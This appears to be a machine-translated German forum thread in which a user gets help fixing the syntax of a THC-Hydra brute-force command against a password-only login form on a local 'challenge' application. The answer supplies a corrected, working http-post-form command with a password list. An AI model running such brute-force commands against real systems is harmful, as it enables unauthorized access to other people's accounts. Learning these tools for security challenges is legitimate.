Hydra-Brute-Force-Fehler

1794
Proletariat 
hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.  Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37 [INFO] Using HTTP Proxy: http://127.0.0.1:8080 [ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!

Ich bin nicht sicher, warum ich die Fehlermeldung bekomme, da die ^PASS^Zeichenfolge vorhanden ist. Die Anwendung enthält keinen Benutzernamen.

Die vollständige URL des Anmeldeformulars lautet: http://192.168.0.24:1234/

Kann jemand helfen?

0
Es sieht so aus, als müssten Sie die Dokumentation etwas mehr lesen und Ihre Syntax überprüfen. Zum Beispiel: `" /: password = ^ PASS ^ ` schroeder vor 6 Jahren 0

1 Antwort auf die Frage

1
galoget

Über Ihre Frage:

  1. Bei der Verwendung von Hydra ist es nicht erforderlich, http://dass Sie den Host vor den Angriff stellen.
  2. Um den Port anzugeben, verwenden Sie bitte die -sFlagge.
  3. Sie müssen das -lFlag angeben, andernfalls wird ein Fehler angezeigt.
  4. In der POST-Anforderung müssen Sie die Datei angeben, die die POST-Anforderung erhalten soll (z. B. index.php, password.php, validate.php usw.).
  5. Und nicht zuletzt müssen Sie den Erfolgsfall oder den Fehlerfall angeben.

Versuchen Sie den folgenden Befehl, es ist das Beste, was ich mit den bereitgestellten Informationen tun kann:

hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt

Ich habe es selbst ausprobiert und es erzeugt keinerlei Fehler.

Viel Glück!

Vielen Dank. Das Formular scheint jedoch nirgendwo veröffentlicht zu werden, so dass `index.php` nicht richtig wäre. Es ist eine herausforderung anwendung. `


` Proletariat vor 6 Jahren 0
Es muss irgendwo POST stehen. Dies kann bedeuten, dass dieselbe Datei über das Formular verfügt und das Formular validiert. Sie müssen nach dem Namen dieser Datei suchen und dann sind Sie fertig. In den meisten Fällen lautet die Hauptseite einer Website ` index.php`, also können Sie dies überprüfen, wenn Sie zu `192.168.0.24 / index.php` gehen, wenn Sie dasselbe Anmeldeformular erhalten, dann haben Sie Ihre Antwort. Können Sie auch mehr Details zu den Herausforderungen mitteilen, die hilfreich sein könnten. galoget vor 6 Jahren 0
Vielen Dank. Ist auch das `: F` für den Fehlerfall irgendwo dokumentiert? Ich sehe es nicht im "-h" des Tools. Proletariat vor 6 Jahren 0
Hier finden Sie einige Beispiele: [THC-Hydra mit Passwort nur Anmeldeformular] (https://forums.hak5.org/topic/39652-thc-hydra-with-password-only-login-form/) und [How Verwende ich THC-Hydra mit einem Nur-Passwort-Formularfeld] (https://null-byte.wonderhowto.com/forum/do-use-thc-hydra-with-password-only-form-field-0175294/), Vergessen Sie nicht, die Frage als gelöst zu kennzeichnen, wenn die gelieferte Lösung funktioniert. galoget vor 6 Jahren 0

Verwandte Probleme